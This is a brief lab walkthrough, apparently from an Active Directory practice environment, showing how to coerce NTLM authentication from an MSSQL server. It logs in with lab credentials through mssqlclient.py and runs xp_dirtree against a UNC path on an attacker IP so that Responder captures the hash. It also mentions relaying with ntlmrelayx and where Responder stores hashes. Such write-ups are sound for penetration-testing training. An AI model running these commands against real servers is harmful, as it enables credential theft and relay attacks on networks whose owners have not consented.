MSSQL Coerce and relay

• Mssql can also be use to coerce an NTLM authentication from the mssql server. The incoming connection will be from the user who run the mssql server.

• In our case if we tale any user like miguel.cabrera for example we can get an NTLM authentication

mssqlclient.py -windows-auth north.newyork.local/miguel.cabrera:ilovebaseball@yonkers.north.newyork.local

or

mssqlclient.py -windows-auth north.newyork.local/pacofish:pacofish@yonkers.north.newyork.local

• run a xp_dirtree command :

exec master.sys.xp_dirtree '\\192.168.56.31\demontlm',1,1

• And we get a connection back to our responder

• This will work also with ntlmrelayx (like with a server running as administrator and with the same password on other servers). But on the lab, this kind of behavior is not setup by now.

Responder HASH Location

/usr/share/responder/logs